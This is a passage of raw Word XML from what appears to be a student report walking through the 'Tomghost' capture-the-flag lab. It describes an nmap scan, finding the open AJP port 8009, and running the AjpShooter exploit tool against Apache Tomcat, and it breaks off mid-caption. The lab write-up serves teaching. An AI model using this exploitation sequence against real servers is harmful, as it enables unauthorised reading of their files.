          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06A00B12" wp14:editId="2435F9EA">
            <wp:extent cx="5731510" cy="996315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="760259258" name="Picture 76025925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58" name="Picture 760259258" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="996315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="524FB868" w14:textId="7CD913F0" w:rsidR="0015416F" w:rsidRDefault="0015416F" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="_Toc111363660"/>
      <w:bookmarkStart w:id="398" w:name="_Toc111363797"/>
      <w:bookmarkStart w:id="399" w:name="_Toc111981822"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>97</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Tomghost Directory and Readme File Created</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMjhmNmFhMjgtNGVmMC00ODI5LWIwOTctOGRhNDY4OTQ0ZWQ1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1858734900"/>
          <w:placeholder>
            <w:docPart w:val="5F54E9EB21B8419C91ADE62F933935BF"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="397"/>
      <w:bookmarkEnd w:id="398"/>
      <w:bookmarkEnd w:id="399"/>
    </w:p>
    <w:p w14:paraId="7D44F6A9" w14:textId="6B752F35" w:rsidR="00DF1C41" w:rsidRDefault="00DF1C41" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A0FF11" w14:textId="023F7F03" w:rsidR="0015416F" w:rsidRDefault="0015416F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A directory for nmap was created and a scan run using the </w:t>
      </w:r>
      <w:r w:rsidR="00A43AA6">
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A43AA6">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>-sC sV -oN nmap $IP</w:t>
      </w:r>
      <w:r w:rsidR="00A43AA6">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00666A4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A575F">
        <w:t xml:space="preserve">The -sC will run the default script scan, the -sV will give a details output of </w:t>
      </w:r>
      <w:r w:rsidR="008A575F">
        <w:lastRenderedPageBreak/>
        <w:t>the ports and the -oN will output to text file</w:t>
      </w:r>
      <w:r w:rsidR="008A575F" w:rsidRPr="008A575F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A575F">
        <w:t xml:space="preserve">as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00E76698">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="008A575F">
        <w:t>. Ports 22 (SSH), 53 (DNS), 8009 (AJP), and 8080 (HTTP) are open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BABE4BB" w14:textId="70F09235" w:rsidR="00666A4A" w:rsidRDefault="00053C69" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00053C69">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25FB9C9A" wp14:editId="42CAFFA4">
            <wp:extent cx="5731510" cy="3364230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="760259267" name="Picture 76025926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67" name="Picture 760259267" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3364230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825F456" w14:textId="0FEA38E7" w:rsidR="00053C69" w:rsidRDefault="00053C69" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="400" w:name="_Toc111363661"/>
      <w:bookmarkStart w:id="401" w:name="_Toc111363798"/>
      <w:bookmarkStart w:id="402" w:name="_Toc111981823"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>98</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Nmap</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYzc3MjliMjktNmFkNi00ZGM3LTk5ODUtZDA0NmJlMWY5MDY0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2022849471"/>
          <w:placeholder>
            <w:docPart w:val="B3C388D15E8B4130AC3BEDAFBB4E3FAF"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="400"/>
      <w:bookmarkEnd w:id="401"/>
      <w:bookmarkEnd w:id="402"/>
    </w:p>
    <w:p w14:paraId="4CD39301" w14:textId="698F6022" w:rsidR="0015416F" w:rsidRDefault="0015416F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA9684F" w14:textId="5A51AA6C" w:rsidR="00053C69" w:rsidRDefault="00053C69" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla Firefox was opened, and the virtual machine Internet Protocol address and port number was input to test whether the Apache Tomcat Webserver was running as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CECF2F" w14:textId="79BC625A" w:rsidR="00053C69" w:rsidRDefault="00733D7B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00733D7B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B15FE78" wp14:editId="42CD9862">
            <wp:extent cx="5731510" cy="2572385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="760259268" name="Picture 760259268" descr="Graphical user interface, text,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68" name="Picture 760259268" descr="Graphical user interface, text, application, website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2572385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD070A9" w14:textId="7442B27C" w:rsidR="00053C69" w:rsidRDefault="00053C69" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="_Toc111363662"/>
      <w:bookmarkStart w:id="404" w:name="_Toc111363799"/>
      <w:bookmarkStart w:id="405" w:name="_Toc111981824"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Apache Tomcat is running</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMTMxMGRjZGUtM2Y2MS00YTczLWJkY2EtYjg4OGM1NjY4MWY5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152582606"/>
          <w:placeholder>
            <w:docPart w:val="ED0956A66DF2475F9F7BE07D20875025"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="403"/>
      <w:bookmarkEnd w:id="404"/>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="301E91E9" w14:textId="77777777" w:rsidR="00053C69" w:rsidRDefault="00053C69" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8D9314" w14:textId="4F056467" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The command ‘python ajpShooter.py’ was given to run it as outlined in figure 10</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55505323" w14:textId="77777777" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215D52">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562CE14D" wp14:editId="12CC27A2">
            <wp:extent cx="6144024" cy="2295330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="294847906" name="Picture 29484790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847906" name="Picture 294847906" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6150605" cy="2297788"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00215D52">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05923CA3" w14:textId="1661A0AC" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="_Toc111363665"/>
      <w:bookmarkStart w:id="407" w:name="_Toc111363802"/>
      <w:bookmarkStart w:id="408" w:name="_Toc111981825"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>100</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Run AjpShooter </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMjJkMmJjMTItOWVlYS00ZTUxLThhN2EtOGZiZDU2MGE0NThm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1387756205"/>
          <w:placeholder>
            <w:docPart w:val="3D08CA0525554A9C8A227A9EFD2EBC46"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="406"/>
      <w:bookmarkEnd w:id="407"/>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p w14:paraId="6D3BE0DF" w14:textId="272C4748" w:rsidR="002B7C7E" w:rsidRDefault="002B7C7E" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CAC2C15" w14:textId="477C9315" w:rsidR="003D51D7" w:rsidRDefault="002B7C7E" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apache Tomcat</w:t>
      </w:r>
      <w:r w:rsidR="003D51D7" w:rsidRPr="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> running </w:t>
      </w:r>
      <w:r w:rsidR="003D51D7" w:rsidRPr="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> AjpShooter</w:t>
      </w:r>
      <w:r w:rsidR="003D51D7" w:rsidRPr="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be </w:t>
      </w:r>
      <w:r w:rsidR="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>executed</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8706B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> To do this the command is run and all the arguments are input (</w:t>
      </w:r>
      <w:r w:rsidR="003D51D7">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, AJP </w:t>
      </w:r>
      <w:r w:rsidR="003D51D7">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>port, target file and shooter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E023CA" w14:textId="25D65482" w:rsidR="00062370" w:rsidRDefault="003D51D7" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D51D7">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D06DB2C" wp14:editId="4BA535CE">
            <wp:extent cx="6376461" cy="335902"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="760259217" name="Picture 760259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8"/>
                    <a:srcRect l="486" t="43773" b="3769"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6408977" cy="337615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74C330" w14:textId="10809869" w:rsidR="003D51D7" w:rsidRDefault="003D51D7" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc111363666"/>
      <w:bookmarkStart w:id="410" w:name="_Toc111363803"/>
      <w:bookmarkStart w:id="411" w:name="_Toc111981826"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>101</w:t>
        </w:r>
